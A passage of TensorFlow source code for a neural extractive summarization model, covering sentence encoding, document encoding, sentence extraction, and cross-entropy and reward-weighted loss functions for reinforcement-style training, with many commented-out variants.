# Get fullvocab_embed_variable
fullvocab_embed_variable = tf.concat(axis = 0, values = [pad_embed_variable, unk_embed_variable, vocab_embed_variable])
# print(fullvocab_embed_variable)
### Lookup layer
with tf.variable_scope('Lookup') as scope:
document_placeholder_flat = tf.reshape(document_placeholder, [-1])
document_word_embedding = tf.nn.embedding_lookup(fullvocab_embed_variable, document_placeholder_flat, name="Lookup")
document_word_embedding = tf.reshape(document_word_embedding, [-1, (FLAGS.max_doc_length + FLAGS.max_title_length + FLAGS.max_image_length),
FLAGS.max_sent_length, FLAGS.wordembed_size])
# print(document_word_embedding)
### Convolution Layer
with tf.variable_scope('ConvLayer') as scope:
document_word_embedding = tf.reshape(document_word_embedding, [-1, FLAGS.max_sent_length, FLAGS.wordembed_size])
document_sent_embedding = conv1d_layer_sentence_representation(document_word_embedding) # [None, sentembed_size]
document_sent_embedding = tf.reshape(document_sent_embedding, [-1, (FLAGS.max_doc_length + FLAGS.max_title_length + FLAGS.max_image_length),
FLAGS.sentembed_size])
# print(document_sent_embedding)
### Reshape Tensor to List [-1, (max_doc_length+max_title_length+max_image_length), sentembed_size] -> List of [-1, sentembed_size]
with variable_scope.variable_scope("ReshapeDoc_TensorToList"):
document_sent_embedding = reshape_tensor2list(document_sent_embedding, (FLAGS.max_doc_length + FLAGS.max_title_length + FLAGS.max_image_length), FLAGS.sentembed_size)
# print(document_sent_embedding)
# document_sents_enc
document_sents_enc = document_sent_embedding[:FLAGS.max_doc_length]
if FLAGS.doc_encoder_reverse:
document_sents_enc = document_sents_enc[::-1]
# document_sents_ext
document_sents_ext = document_sent_embedding[:FLAGS.max_doc_length]
# document_sents_titimg
document_sents_titimg = document_sent_embedding[FLAGS.max_doc_length:]
### Document Encoder
with tf.variable_scope('DocEnc') as scope:
encoder_outputs, encoder_state = simple_rnn(document_sents_enc)
### Sentence Label Extractor
with tf.variable_scope('SentExt') as scope:
if (FLAGS.attend_encoder) and (len(document_sents_titimg) != 0):
# Multiple decoder
print("Multiple decoder is not implement yet.")
exit(0)
# # Decoder to attend captions
# attendtitimg_extractor_output, _ = simple_attentional_rnn(document_sents_ext, document_sents_titimg, initial_state=encoder_state)
# # Attend previous decoder
# logits = sentence_extractor_seqrnn_docatt(document_sents_ext, attendtitimg_extractor_output, encoder_state, label_placeholder)
elif (not FLAGS.attend_encoder) and (len(document_sents_titimg) != 0):
# Attend only titimages during decoding
extractor_output, logits = sentence_extractor_nonseqrnn_titimgatt(document_sents_ext, encoder_state, document_sents_titimg)
elif (FLAGS.attend_encoder) and (len(document_sents_titimg) == 0):
# JP model: attend encoder
extractor_outputs, logits = sentence_extractor_seqrnn_docatt(document_sents_ext, encoder_outputs, encoder_state, label_placeholder)
else:
# Attend nothing
extractor_output, logits = sentence_extractor_nonseqrnn_noatt(document_sents_ext, encoder_state)
# print(extractor_output)
# print(logits)
return extractor_output, logits
def baseline_future_reward_estimator(extractor_output):
"""Implements linear regression to estimate future rewards
Args:
extractor_output: [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.size or 2*FLAGS.size]
Output:
rewards: [FLAGS.batch_size, FLAGS.max_doc_length]
"""
with tf.variable_scope('FutureRewardEstimator') as scope:
last_size = extractor_output.get_shape()[2].value
# Define Variables
weight = variable_on_cpu('weight', [last_size, 1], tf.random_normal_initializer())
bias = variable_on_cpu('bias', [1], tf.random_normal_initializer())
extractor_output_forreward = tf.reshape(extractor_output, [-1, last_size])
future_rewards = tf.matmul(extractor_output_forreward, weight) + bias
# future_rewards: [FLAGS.batch_size, FLAGS.max_doc_length, 1]
future_rewards = tf.reshape(future_rewards, [-1, FLAGS.max_doc_length, 1])
future_rewards = tf.squeeze(future_rewards)
return future_rewards
def baseline_single_future_reward_estimator(extractor_output):
"""Implements linear regression to estimate future rewards for whole document
Args:
extractor_output: [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.size or 2*FLAGS.size]
Output:
rewards: [FLAGS.batch_size]
"""
with tf.variable_scope('FutureRewardEstimator') as scope:
last_size = extractor_output.get_shape()[2].value
# Define Variables
weight = variable_on_cpu('weight', [FLAGS.max_doc_length*last_size, 1], tf.random_normal_initializer())
bias = variable_on_cpu('bias', [1], tf.random_normal_initializer())
extractor_output_forreward = tf.reshape(extractor_output, [-1, FLAGS.max_doc_length*last_size]) # [FLAGS.batch_size, FLAGS.max_doc_length*(FLAGS.size or 2*FLAGS.size)]
future_rewards = tf.matmul(extractor_output_forreward, weight) + bias # [FLAGS.batch_size, 1]
# future_rewards: [FLAGS.batch_size, 1]
future_rewards = tf.squeeze(future_rewards) # [FLAGS.batch_size]
return future_rewards
### Loss Functions
def mean_square_loss_doclevel(future_rewards, actual_reward):
"""Implements mean_square_loss for futute reward prediction
args:
future_rewards: [FLAGS.batch_size]
actual_reward: [FLAGS.batch_size]
Output
Float Value
"""
with tf.variable_scope('MeanSquareLoss') as scope:
sq_loss = tf.square(future_rewards - actual_reward) # [FLAGS.batch_size]
mean_sq_loss = tf.reduce_mean(sq_loss)
tf.add_to_collection('mean_square_loss', mean_sq_loss)
return mean_sq_loss
def mean_square_loss(future_rewards, actual_reward, weights):
"""Implements mean_square_loss for futute reward prediction
args:
future_rewards: [FLAGS.batch_size, FLAGS.max_doc_length]
actual_reward: [FLAGS.batch_size]
weights: Weights to avoid padded part [FLAGS.batch_size, FLAGS.max_doc_length]
Output
Float Value
"""
with tf.variable_scope('MeanSquareLoss') as scope:
actual_reward = tf.expand_dims(actual_reward, 1) # [FLAGS.batch_size, 1]
sq_loss = tf.square(future_rewards - actual_reward) # [FLAGS.batch_size, FLAGS.max_doc_length]
mean_sq_loss = 0
if FLAGS.weighted_loss:
sq_loss = tf.mul(sq_loss, weights)
sq_loss_sum = tf.reduce_sum(sq_loss)
valid_sentences = tf.reduce_sum(weights)
mean_sq_loss = sq_loss_sum / valid_sentences
else:
mean_sq_loss = tf.reduce_mean(sq_loss)
tf.add_to_collection('mean_square_loss', mean_sq_loss)
return mean_sq_loss
def cross_entropy_loss(logits, labels, weights):
"""Estimate cost of predictions
Add summary for "cost" and "cost/avg".
Args:
logits: Logits from inference(). [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
labels: Sentence extraction gold levels [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
weights: Weights to avoid padded part [FLAGS.batch_size, FLAGS.max_doc_length]
Returns:
Cross-entropy Cost
"""
with tf.variable_scope('CrossEntropyLoss') as scope:
# Reshape logits and labels to match the requirement of softmax_cross_entropy_with_logits
logits = tf.reshape(logits, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size]
labels = tf.reshape(labels, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size]
cross_entropy = tf.nn.softmax_cross_entropy_with_logits(logits, labels) # [FLAGS.batch_size*FLAGS.max_doc_length]
cross_entropy = tf.reshape(cross_entropy, [-1, FLAGS.max_doc_length]) # [FLAGS.batch_size, FLAGS.max_doc_length]
if FLAGS.weighted_loss:
cross_entropy = tf.mul(cross_entropy, weights)
# Cross entroy / document
cross_entropy = tf.reduce_sum(cross_entropy, reduction_indices=1) # [FLAGS.batch_size]
cross_entropy_mean = tf.reduce_mean(cross_entropy, name='crossentropy')
# ## Cross entroy / sentence
# cross_entropy_sum = tf.reduce_sum(cross_entropy)
# valid_sentences = tf.reduce_sum(weights)
# cross_entropy_mean = cross_entropy_sum / valid_sentences
# cross_entropy = -tf.reduce_sum(labels * tf.log(logits), reduction_indices=1)
# cross_entropy_mean = tf.reduce_mean(cross_entropy, name='crossentropy')
tf.add_to_collection('cross_entropy_loss', cross_entropy_mean)
# # # The total loss is defined as the cross entropy loss plus all of
# # # the weight decay terms (L2 loss).
# # return tf.add_n(tf.get_collection('losses'), name='total_loss')
return cross_entropy_mean
def predict_labels(logits):
""" Predict self labels
logits: Logits from inference(). [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
Return [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
"""
with tf.variable_scope('PredictLabels') as scope:
# Reshape logits for argmax and argmin
logits = tf.reshape(logits, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size]
# Get labels predicted using these logits
logits_argmax = tf.argmax(logits, 1) # [FLAGS.batch_size*FLAGS.max_doc_length]
logits_argmax = tf.reshape(logits_argmax, [-1, FLAGS.max_doc_length]) # [FLAGS.batch_size, FLAGS.max_doc_length]
logits_argmax = tf.expand_dims(logits_argmax, 2) # [FLAGS.batch_size, FLAGS.max_doc_length, 1]
logits_argmin = tf.argmin(logits, 1) # [FLAGS.batch_size*FLAGS.max_doc_length]
logits_argmin = tf.reshape(logits_argmin, [-1, FLAGS.max_doc_length]) # [FLAGS.batch_size, FLAGS.max_doc_length]
logits_argmin = tf.expand_dims(logits_argmin, 2) # [FLAGS.batch_size, FLAGS.max_doc_length, 1]
# Convert argmin and argmax to labels, works only if FLAGS.target_label_size = 2
labels = tf.concat(2, [logits_argmin, logits_argmax]) # [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
dtype = tf.float16 if FLAGS.use_fp16 else tf.float32
labels = tf.cast(labels, dtype)
return labels
def estimate_ltheta_ot(logits, labels, future_rewards, actual_rewards, weights):
"""
Args:
logits: Logits from inference(). [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
labels: Label placeholdr for self prediction [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
future_rewards: [FLAGS.batch_size, FLAGS.max_doc_length]
actual_reward: [FLAGS.batch_size]
weights: Weights to avoid padded part [FLAGS.batch_size, FLAGS.max_doc_length]
Returns:
[FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
"""
with tf.variable_scope('LTheta_Ot') as scope:
# Get Reward Weights: External reward - Predicted reward
actual_rewards = tf.tile(actual_rewards, [FLAGS.max_doc_length]) # [FLAGS.batch_size * FLAGS.max_doc_length] , [a,b] * 3 = [a, b, a, b, a, b]
actual_rewards = tf.reshape(actual_rewards, [FLAGS.max_doc_length, -1]) # [FLAGS.max_doc_length, FLAGS.batch_size], # [[a,b], [a,b], [a,b]]
actual_rewards = tf.transpose(actual_rewards) # [FLAGS.batch_size, FLAGS.max_doc_length] # [[a,a,a], [b,b,b]]
diff_act_pred = actual_rewards - future_rewards # [FLAGS.batch_size, FLAGS.max_doc_length]
diff_act_pred = tf.expand_dims(diff_act_pred, 2) # [FLAGS.batch_size, FLAGS.max_doc_length, 1]
# Convert (FLAGS.target_label_size = 2)
diff_act_pred = tf.concat(2, [diff_act_pred, diff_act_pred]) # [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# Reshape logits and labels to match the requirement of softmax_cross_entropy_with_logits
logits = tf.reshape(logits, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size]
logits = tf.nn.softmax(logits)
logits = tf.reshape(logits, [-1, FLAGS.max_doc_length, FLAGS.target_label_size]) # [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# Get the difference
diff_logits_indicator = logits - labels # [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# Multiply with reward
d_ltheta_ot = tf.mul(diff_act_pred, diff_logits_indicator) # [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# Multiply with weight
weights = tf.expand_dims(weights, 2) # [FLAGS.batch_size, FLAGS.max_doc_length, 1]
weights = tf.concat(2, [weights, weights]) # [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
d_ltheta_ot = tf.mul(d_ltheta_ot, weights) # [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
return d_ltheta_ot
# def estimate_ltheta_ot_mixer(logits, labels_gold, labels_pred, future_rewards, actual_rewards, weights, annealing_step):
# """
# Args:
# logits: Logits from inference(). [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# labels_gold: Label placeholdr for gold labels [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# labels_pred: Label placeholdr for self prediction [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# future_rewards: [FLAGS.batch_size, FLAGS.max_doc_length]
# actual_reward: [FLAGS.batch_size]
# weights: Weights to avoid padded part [FLAGS.batch_size, FLAGS.max_doc_length]
# annealing_step: [1], single value but in tensor form
# Returns:
# [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# """
# with tf.variable_scope('LTheta_Ot_Mixer') as scope:
# print(annealing_step)
# policygradloss_length = tf.reduce_sum(annealing_step) * FLAGS.annealing_step_delta
# crossentryloss_length = FLAGS.max_doc_length - policygradloss_length
# # Reshape logits and partition
# logits = tf.reshape(logits, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size]
# logits = tf.nn.softmax(logits)
# logits = tf.reshape(logits, [-1, FLAGS.max_doc_length, FLAGS.target_label_size]) # [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# logits_list = reshape_tensor2list(logits, FLAGS.max_doc_length, FLAGS.target_label_size)
# logits_ce_gold_list = logits_list[0:crossentryloss_length]
# logits_ce_gold = reshape_list2tensor(logits_ce_gold_list, crossentryloss_length, FLAGS.target_label_size) # [FLAGS.batch_size, crossentryloss_length, FLAGS.target_label_size]
# logits_reward_list = logits_list[crossentryloss_length:]
# logits_reward = reshape_list2tensor(logits_reward_list, policygradloss_length, FLAGS.target_label_size) # [FLAGS.batch_size, policygradloss_length, FLAGS.target_label_size]
# # Crossentropy loss with gold labels: partition gold_labels
# labels_gold_list = reshape_tensor2list(labels_gold, FLAGS.max_doc_length, FLAGS.target_label_size)
# labels_gold_used_list = labels_gold_list[0:crossentryloss_length]
# labels_gold_used = reshape_list2tensor(labels_gold_used_list, crossentryloss_length, FLAGS.target_label_size) # [FLAGS.batch_size, crossentryloss_length, FLAGS.target_label_size]
# # d_ltheta_ot : cross entropy
# diff_logits_goldlabels = logits_ce_gold - labels_gold_used # [FLAGS.batch_size, crossentryloss_length, FLAGS.target_label_size]
# # Policy gradient for rest
# # Get Reward Weights: External reward - Predicted reward
# actual_rewards = tf.tile(actual_rewards, [FLAGS.max_doc_length]) # [FLAGS.batch_size * FLAGS.max_doc_length] , [a,b] * 3 = [a, b, a, b, a, b]
# actual_rewards = tf.reshape(actual_rewards, [FLAGS.max_doc_length, -1]) # [FLAGS.max_doc_length, FLAGS.batch_size], # [[a,b], [a,b], [a,b]]
# actual_rewards = tf.transpose(actual_rewards) # [FLAGS.batch_size, FLAGS.max_doc_length] # [[a,a,a], [b,b,b]]
# diff_act_pred = actual_rewards - future_rewards # [FLAGS.batch_size, FLAGS.max_doc_length]
# diff_act_pred = tf.expand_dims(diff_act_pred, 2) # [FLAGS.batch_size, FLAGS.max_doc_length, 1]
# # Convert (FLAGS.target_label_size = 2)
# diff_act_pred = tf.concat(2, [diff_act_pred, diff_act_pred]) # [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# # Get used reward diff
# diff_act_pred_list = reshape_tensor2list(diff_act_pred, FLAGS.max_doc_length, FLAGS.target_label_size)
# diff_reward_act_pred_used_list = diff_act_pred_list[crossentryloss_length:]
# diff_reward_act_pred_used = reshape_list2tensor(diff_reward_act_pred_used_list, policygradloss_length, FLAGS.target_label_size) # [FLAGS.batch_size, policygradloss_length, FLAGS.target_label_size]
# # Partition predicted labels
# labels_pred_list = reshape_tensor2list(labels_pred, FLAGS.max_doc_length, FLAGS.target_label_size)
# labels_pred_used_list = labels_pred_list[crossentryloss_length:]
# labels_pred_used = reshape_list2tensor(labels_pred_used_list, policygradloss_length, FLAGS.target_label_size) # [FLAGS.batch_size, policygradloss_length, FLAGS.target_label_size]
# # d_ltheta_ot : reward weighted
# diff_logits_predlabels = logits_reward - labels_pred_used # [FLAGS.batch_size, policygradloss_length, FLAGS.target_label_size]
# # Multiply with reward
# reward_weighted_diff_logits_predlabels = tf.mul(diff_reward_act_pred_used, diff_logits_predlabels) # [FLAGS.batch_size, policygradloss_length, FLAGS.target_label_size]
# # Concat both part
# d_ltheta_ot_mixer = tf.concat(1, [diff_logits_goldlabels, reward_weighted_diff_logits_predlabels]) # [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# # Multiply with weight
# weights = tf.expand_dims(weights, 2) # [FLAGS.batch_size, FLAGS.max_doc_length, 1]
# weights = tf.concat(2, [weights, weights]) # [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# d_ltheta_ot_mixer = tf.mul(d_ltheta_ot_mixer, weights) # [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# return d_ltheta_ot_mixer
def reward_weighted_cross_entropy_loss_multisample(logits, labels, actual_rewards, weights):
"""Estimate cost of predictions
Add summary for "cost" and "cost/avg".
Args:
logits: Logits from inference(). [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
labels: Label placeholdr for multiple sampled prediction [FLAGS.batch_size, 1, FLAGS.max_doc_length, FLAGS.target_label_size]
actual_rewards: [FLAGS.batch_size, 1]
weights: Weights to avoid padded part [FLAGS.batch_size, FLAGS.max_doc_length]
Returns:
Cross-entropy Cost
"""
with tf.variable_scope('RWCELossMultiSample') as scope:
# Expand logits and weights for roll outs
logits_temp = tf.expand_dims(logits, 1) # [FLAGS.batch_size, 1, FLAGS.max_doc_length, FLAGS.target_label_size]
weights_temp = tf.expand_dims(weights, 1) # [FLAGS.batch_size, 1, FLAGS.max_doc_length]
logits_expanded = logits_temp
weights_expanded = weights_temp
# for ridx in range(1,FLAGS.num_sample_rollout):
# logits_expanded = tf.concat(1, [logits_expanded, logits_temp]) # [FLAGS.batch_size, n++, FLAGS.max_doc_length, FLAGS.target_label_size]
# weights_expanded = tf.concat(1, [weights_expanded, weights_temp]) # [FLAGS.batch_size, n++, FLAGS.max_doc_length]
# Reshape logits and labels to match the requirement of softmax_cross_entropy_with_logits
logits_expanded = tf.reshape(logits_expanded, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*1*FLAGS.max_doc_length, FLAGS.target_label_size]
labels = tf.reshape(labels, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*1*FLAGS.max_doc_length, FLAGS.target_label_size]
cross_entropy = tf.nn.softmax_cross_entropy_with_logits(logits = logits_expanded, labels = labels) # [FLAGS.batch_size*1*FLAGS.max_doc_length]
cross_entropy = tf.reshape(cross_entropy, [-1, 1, FLAGS.max_doc_length]) # [FLAGS.batch_size, 1, FLAGS.max_doc_length]
if FLAGS.weighted_loss:
cross_entropy = tf.multiply(cross_entropy, weights_expanded) # [FLAGS.batch_size, 1, FLAGS.max_doc_length]
# Reshape actual rewards
actual_rewards = tf.reshape(actual_rewards, [-1]) # [FLAGS.batch_size*1]
# [[a, b], [c, d], [e, f]] 3x2 => [a, b, c, d, e, f] [6]
actual_rewards = tf.tile(actual_rewards, [FLAGS.max_doc_length]) # [FLAGS.batch_size * 1 * FLAGS.max_doc_length]
# [a, b, c, d, e, f] * 2 = [a, b, c, d, e, f, a, b, c, d, e, f] [12]
actual_rewards = tf.reshape(actual_rewards, [FLAGS.max_doc_length, -1]) # [FLAGS.max_doc_length, FLAGS.batch_size*1]
# [[a, b, c, d, e, f], [a, b, c, d, e, f]] [2, 6]
actual_rewards = tf.transpose(actual_rewards) # [FLAGS.batch_size*1, FLAGS.max_doc_length]
# [[a,a], [b,b], [c,c], [d,d], [e,e], [f,f]] [6 x 2]
actual_rewards = tf.reshape(actual_rewards, [-1, 1, FLAGS.max_doc_length]) # [FLAGS.batch_size, 1, FLAGS.max_doc_length],
# [[[a,a], [b,b]], [[c,c], [d,d]], [[e,e], [f,f]]] [3 x 2 x 2]
# Multiply with reward
reward_weighted_cross_entropy = tf.multiply(cross_entropy, actual_rewards) # [FLAGS.batch_size, 1, FLAGS.max_doc_length]
# Cross entroy / sample / document
reward_weighted_cross_entropy = tf.reduce_sum(reward_weighted_cross_entropy, reduction_indices=2) # [FLAGS.batch_size, 1]
reward_weighted_cross_entropy_mean = tf.reduce_mean(reward_weighted_cross_entropy, name='rewardweightedcemultisample')
tf.add_to_collection('reward_cross_entropy_loss_multisample', reward_weighted_cross_entropy_mean)
return reward_weighted_cross_entropy_mean
def reward_weighted_cross_entropy_loss(logits, labels, actual_rewards, weights):
"""Estimate cost of predictions
Add summary for "cost" and "cost/avg".
Args:
logits: Logits from inference(). [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
labels: Label placeholdr for self prediction [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
actual_reward: [FLAGS.batch_size]
weights: Weights to avoid padded part [FLAGS.batch_size, FLAGS.max_doc_length]
Returns:
Cross-entropy Cost
"""
with tf.variable_scope('RewardWeightedCrossEntropyLoss') as scope:
# Reshape logits and labels to match the requirement of softmax_cross_entropy_with_logits
logits = tf.reshape(logits, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size]
labels = tf.reshape(labels, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size]
cross_entropy = tf.nn.softmax_cross_entropy_with_logits(logits, labels) # [FLAGS.batch_size*FLAGS.max_doc_length]
cross_entropy = tf.reshape(cross_entropy, [-1, FLAGS.max_doc_length]) # [FLAGS.batch_size, FLAGS.max_doc_length]
if FLAGS.weighted_loss:
cross_entropy = tf.mul(cross_entropy, weights) # [FLAGS.batch_size, FLAGS.max_doc_length]
# Reshape actual rewards
actual_rewards = tf.tile(actual_rewards, [FLAGS.max_doc_length]) # [FLAGS.batch_size * FLAGS.max_doc_length] , [a,b] * 3 = [a, b, a, b, a, b]
actual_rewards = tf.reshape(actual_rewards, [FLAGS.max_doc_length, -1]) # [FLAGS.max_doc_length, FLAGS.batch_size], # [[a,b], [a,b], [a,b]]
actual_rewards = tf.transpose(actual_rewards) # [FLAGS.batch_size, FLAGS.max_doc_length] # [[a,a,a], [b,b,b]]
# Multiply with reward
reward_weighted_cross_entropy = tf.mul(cross_entropy, actual_rewards) # [FLAGS.batch_size, FLAGS.max_doc_length]
# Cross entroy / document
reward_weighted_cross_entropy = tf.reduce_sum(reward_weighted_cross_entropy, reduction_indices=1) # [FLAGS.batch_size]
reward_weighted_cross_entropy_mean = tf.reduce_mean(reward_weighted_cross_entropy, name='rewardweightedcrossentropy')
tf.add_to_collection('reward_cross_entropy_loss', reward_weighted_cross_entropy_mean)
return reward_weighted_cross_entropy_mean
# def reward_weighted_cross_entropy_loss(logits, labels, future_rewards, actual_rewards, weights):
# """Estimate cost of predictions
# Add summary for "cost" and "cost/avg".
# Args:
# logits: Logits from inference(). [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# labels: Label placeholdr for self prediction [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# future_rewards: [FLAGS.batch_size, FLAGS.max_doc_length]
# actual_reward: [FLAGS.batch_size]
# weights: Weights to avoid padded part [FLAGS.batch_size, FLAGS.max_doc_length]
# Returns:
# Cross-entropy Cost
# """
# with tf.variable_scope('RewardWeightedCrossEntropyLoss') as scope:
# # Get Reward Weights: External reward - Predicted reward
# actual_rewards = tf.tile(actual_rewards, [FLAGS.max_doc_length]) # [FLAGS.batch_size * FLAGS.max_doc_length] , [a,b] * 3 = [a, b, a, b, a, b]
# actual_rewards = tf.reshape(actual_rewards, [FLAGS.max_doc_length, -1]) # [FLAGS.max_doc_length, FLAGS.batch_size], # [[a,b], [a,b], [a,b]]
# actual_rewards = tf.transpose(actual_rewards) # [FLAGS.batch_size, FLAGS.max_doc_length] # [[a,a,a], [b,b,b]]
# # Error: actual_rewards = tf.reshape(tf.tile(actual_rewards, [FLAGS.max_doc_length]),[-1, FLAGS.max_doc_length]) # [FLAGS.batch_size, FLAGS.max_doc_length]
# diff_act_pred = future_rewards - actual_rewards # actual_rewards - future_rewards # [FLAGS.batch_size, FLAGS.max_doc_length]
# # Reshape logits and labels to match the requirement of softmax_cross_entropy_with_logits
# logits = tf.reshape(logits, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size]
# labels = tf.reshape(labels, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size]
# cross_entropy = tf.nn.softmax_cross_entropy_with_logits(logits, labels) # [FLAGS.batch_size*FLAGS.max_doc_length]
# cross_entropy = tf.reshape(cross_entropy, [-1, FLAGS.max_doc_length]) # [FLAGS.batch_size, FLAGS.max_doc_length]
# if FLAGS.weighted_loss:
# cross_entropy = tf.mul(cross_entropy, weights) # [FLAGS.batch_size, FLAGS.max_doc_length]
# # Multiply with reward
# reward_weighted_cross_entropy = tf.mul(cross_entropy, diff_act_pred) # [FLAGS.batch_size, FLAGS.max_doc_length]
# # Cross entroy / document
# reward_weighted_cross_entropy = tf.reduce_sum(reward_weighted_cross_entropy, reduction_indices=1) # [FLAGS.batch_size]
# reward_weighted_cross_entropy_mean = tf.reduce_mean(reward_weighted_cross_entropy, name='rewardweightedcrossentropy')
# tf.add_to_collection('reward_cross_entropy_loss', reward_weighted_cross_entropy_mean)
# return reward_weighted_cross_entropy_mean
# def temp_reward_weighted_cross_entropy_loss(logits, labels, future_rewards, actual_rewards, weights):
# """Estimate cost of predictions
# Add summary for "cost" and "cost/avg".
# Args:
# logits: Logits from inference(). [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# labels: Label placeholdr for self prediction [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# future_rewards: [FLAGS.batch_size, FLAGS.max_doc_length]
# actual_reward: [FLAGS.batch_size]
# weights: Weights to avoid padded part [FLAGS.batch_size, FLAGS.max_doc_length]
# Returns:
# Cross-entropy Cost
# """
# with tf.variable_scope('TempRewardWeightedCrossEntropyLoss') as scope:
# # Get Reward Weights: External reward - Predicted reward
# actual_rewards = tf.tile(actual_rewards, [FLAGS.max_doc_length]) # [FLAGS.batch_size * FLAGS.max_doc_length] , [a,b] * 3 = [a, b, a, b, a, b]
# actual_rewards = tf.reshape(actual_rewards, [FLAGS.max_doc_length, -1]) # [FLAGS.max_doc_length, FLAGS.batch_size], # [[a,b], [a,b], [a,b]]
# actual_rewards = tf.transpose(actual_rewards) # [FLAGS.batch_size, FLAGS.max_doc_length] # [[a,a,a], [b,b,b]]
# diff_act_pred = future_rewards - actual_rewards # actual_rewards - future_rewards # [FLAGS.batch_size, FLAGS.max_doc_length]
# # Reshape logits and labels to match the requirement of softmax_cross_entropy_with_logits
# logits = tf.reshape(logits, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size]
# labels = tf.reshape(labels, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size]
# cross_entropy = tf.nn.softmax_cross_entropy_with_logits(logits, labels) # [FLAGS.batch_size*FLAGS.max_doc_length]
# cross_entropy = tf.reshape(cross_entropy, [-1, FLAGS.max_doc_length]) # [FLAGS.batch_size, FLAGS.max_doc_length]
# if FLAGS.weighted_loss:
# cross_entropy = tf.mul(cross_entropy, weights) # [FLAGS.batch_size, FLAGS.max_doc_length]
# # Multiply with reward
# reward_weighted_cross_entropy = tf.mul(cross_entropy, diff_act_pred) # [FLAGS.batch_size, FLAGS.max_doc_length]
# # Cross entroy / document
# reward_weighted_cross_entropy = tf.reduce_sum(reward_weighted_cross_entropy, reduction_indices=1) # [FLAGS.batch_size]
# reward_weighted_cross_entropy_mean = tf.reduce_mean(reward_weighted_cross_entropy, name='rewardweightedcrossentropy')
# optimizer = tf.train.AdamOptimizer(learning_rate=FLAGS.learning_rate, name='adam')
# # Compute gradients of policy network
# policy_network_variables = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope="PolicyNetwork")
# # print(policy_network_variables)
# # Compute gradients of policy network
# grads_and_vars = optimizer.compute_gradients(reward_weighted_cross_entropy_mean, var_list=policy_network_variables)
# # print(grads_and_vars)
# return actual_rewards, cross_entropy, diff_act_pred, reward_weighted_cross_entropy, reward_weighted_cross_entropy_mean, grads_and_vars
# def cross_entropy_loss_selfprediction(logits, weights):
# """Optimizing expected reward: Weighted cross entropy
# args:
# logits: Logits without softmax. [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# weights: Weights to avoid padded part [FLAGS.batch_size, FLAGS.max_doc_length]
# return:
# [FLAGS.batch_size, FLAGS.max_doc_length]
# """
# with tf.variable_scope('SelfPredCrossEntropyLoss') as scope:
# # Reshape logits for argmax and argmin
# logits = tf.reshape(logits, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size]
# # Get labels if predicted using these logits
# logits_argmax = tf.argmax(logits, 1) # [FLAGS.batch_size*FLAGS.max_doc_length]
# logits_argmax = tf.reshape(logits_argmax, [-1, FLAGS.max_doc_length]) # [FLAGS.batch_size, FLAGS.max_doc_length]
# logits_argmax = tf.expand_dims(logits_argmax, 2) # [FLAGS.batch_size, FLAGS.max_doc_length, 1]
# logits_argmin = tf.argmin(logits, 1) # [FLAGS.batch_size*FLAGS.max_doc_length]
# logits_argmin = tf.reshape(logits_argmin, [-1, FLAGS.max_doc_length]) # [FLAGS.batch_size, FLAGS.max_doc_length]
